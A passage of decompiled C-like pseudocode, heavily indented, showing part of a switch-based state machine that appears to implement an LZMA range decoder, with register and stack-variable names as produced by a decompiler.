                                                                                                                                                                                                              													__eax =  *(__ebp - 4);
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                              													__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L132:
                                                                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              													goto L133;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 9:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													goto L89;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                              												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                              													goto L171;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                              												__eflags = _t259;
                                                                                                                                                                                                              												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                                                              												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                                                              												goto L76;
                                                                                                                                                                                                              											case 0xa:
                                                                                                                                                                                                              												goto L0;
                                                                                                                                                                                                              											case 0xb:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              												goto L88;
                                                                                                                                                                                                              											case 0xc:
                                                                                                                                                                                                              												L99:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t334 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t334;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												goto L101;
                                                                                                                                                                                                              											case 0xd:
                                                                                                                                                                                                              												L37:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t122 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t122;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												L39:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              													goto L48;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                                                                              													goto L54;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L41:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                              												 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                                                                              												__eax = __eax << 8;
                                                                                                                                                                                                              												__eax = __eax + __ebx;
                                                                                                                                                                                                              												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edx;
                                                                                                                                                                                                              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													goto L39;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L37;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 0xe:
                                                                                                                                                                                                              												L46:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t156 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t156;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													L48:
                                                                                                                                                                                                              													__eflags = __ebx - 0x100;
                                                                                                                                                                                                              													if(__ebx >= 0x100) {
                                                                                                                                                                                                              														break;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              													__edx = __ebx + __ebx;
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              													__esi = __edx + __eax;
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              													__ax =  *__esi;
                                                                                                                                                                                                              													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              													__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              														__cx = __ax;
                                                                                                                                                                                                              														_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                              														__ebx = _t170;
                                                                                                                                                                                                              														__cx = __ax >> 5;
                                                                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                                                                              														 *__esi = __ax;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              														0x800 = 0x800 - __edi;
                                                                                                                                                                                                              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              														__ebx = __ebx + __ebx;
                                                                                                                                                                                                              														 *__esi = __cx;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              														continue;
                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                              														goto L46;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L54:
                                                                                                                                                                                                              												_t173 = __ebp - 0x34;
                                                                                                                                                                                                              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                              												__eflags =  *_t173;
                                                                                                                                                                                                              												goto L55;
                                                                                                                                                                                                              											case 0xf:
                                                                                                                                                                                                              												L58:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t203 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t203;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												L60:
                                                                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                                                                              													L55:
                                                                                                                                                                                                              													__al =  *(__ebp - 0x44);
                                                                                                                                                                                                              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                              													goto L56;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												L61:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                              													__ebx = _t217;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													goto L60;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L58;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 0x10:
                                                                                                                                                                                                              												L109:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t365 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t365;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												goto L111;
                                                                                                                                                                                                              											case 0x11:
                                                                                                                                                                                                              												goto L69;
                                                                                                                                                                                                              											case 0x12:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                              													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                              													while(1) {
                                                                                                                                                                                                              														L132:
                                                                                                                                                                                                              														 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              														goto L133;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                              												goto L130;
                                                                                                                                                                                                              											case 0x13:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              													_t469 = __ebp - 0x58;
                                                                                                                                                                                                              													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                              													__eflags =  *_t469;
                                                                                                                                                                                                              													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                              													 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                              													L144:
                                                                                                                                                                                                              													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                              													goto L145;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              												 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                              												L130:
                                                                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                              												goto L144;
                                                                                                                                                                                                              											case 0x14:
                                                                                                                                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                              												 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                              												goto L1;
                                                                                                                                                                                                              											case 0x15:
                                                                                                                                                                                                              												__eax = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              												goto L120;
                                                                                                                                                                                                              											case 0x16:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              												__eflags = __eax - 4;
                                                                                                                                                                                                              												if(__eax >= 4) {
                                                                                                                                                                                                              													_push(3);
                                                                                                                                                                                                              													_pop(__eax);
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                              												__eax = __eax << 7;
                                                                                                                                                                                                              												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              												goto L145;
                                                                                                                                                                                                              											case 0x17:
                                                                                                                                                                                                              												L145:
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              												 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                              												goto L149;
                                                                                                                                                                                                              											case 0x18:
                                                                                                                                                                                                              												L146:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                              													goto L170;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												_t484 = __ebp - 0x70;
                                                                                                                                                                                                              												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              												__eflags =  *_t484;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              												L148:
                                                                                                                                                                                                              												_t487 = __ebp - 0x48;
                                                                                                                                                                                                              												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                              												__eflags =  *_t487;
                                                                                                                                                                                                              												L149:
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              													__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                              													__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                              													0 = 1;
                                                                                                                                                                                                              													__eax = 1 << __cl;
                                                                                                                                                                                                              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              													while(1) {
                                                                                                                                                                                                              														 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                              														goto L1;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eax = __eax - __ecx;
                                                                                                                                                                                                              													__edx = __edx + 1;
                                                                                                                                                                                                              													__eflags = __edx;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              													 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													goto L148;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L146;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											case 0x19:
                                                                                                                                                                                                              												__eflags = __ebx - 4;
                                                                                                                                                                                                              												if(__ebx < 4) {
                                                                                                                                                                                                              													 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                              													L119:
                                                                                                                                                                                                              													_t393 = __ebp - 0x2c;
                                                                                                                                                                                                              													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                              													__eflags =  *_t393;
                                                                                                                                                                                                              													L120:
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													if(__eax == 0) {
                                                                                                                                                                                                              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                              														goto L170;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                              													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                              														goto L171;
                                                                                                                                                                                                              													}
                                                                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                              													__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              													_t400 = __ebp - 0x60;
                                                                                                                                                                                                              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                              													__eflags =  *_t400;
                                                                                                                                                                                                              													goto L123;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                                                                              												__eax = __ebx;
                                                                                                                                                                                                              												__ecx = __ebx >> 1;
                                                                                                                                                                                                              												__eax = __ebx & 0x00000001;
                                                                                                                                                                                                              												__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                              												__al = __al | 0x00000002;
                                                                                                                                                                                                              												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                              												__eflags = __ebx - 0xe;
                                                                                                                                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              												if(__ebx >= 0xe) {
                                                                                                                                                                                                              													__ebx = 0;
                                                                                                                                                                                                              													 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                              													L102:
                                                                                                                                                                                                              													__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              													if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              														__eax = __eax + __ebx;
                                                                                                                                                                                                              														 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                              														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              														__eax =  *(__ebp - 4);
                                                                                                                                                                                                              														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                                                                              														L108:
                                                                                                                                                                                                              														__ebx = 0;
                                                                                                                                                                                                              														 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              														 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              														 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                              														 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                              														L112:
                                                                                                                                                                                                              														__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              															_t391 = __ebp - 0x2c;
                                                                                                                                                                                                              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                              															__eflags =  *_t391;
                                                                                                                                                                                                              															goto L119;
                                                                                                                                                                                                              														}
                                                                                                                                                                                                              														__eax =  *(__ebp - 0x50);
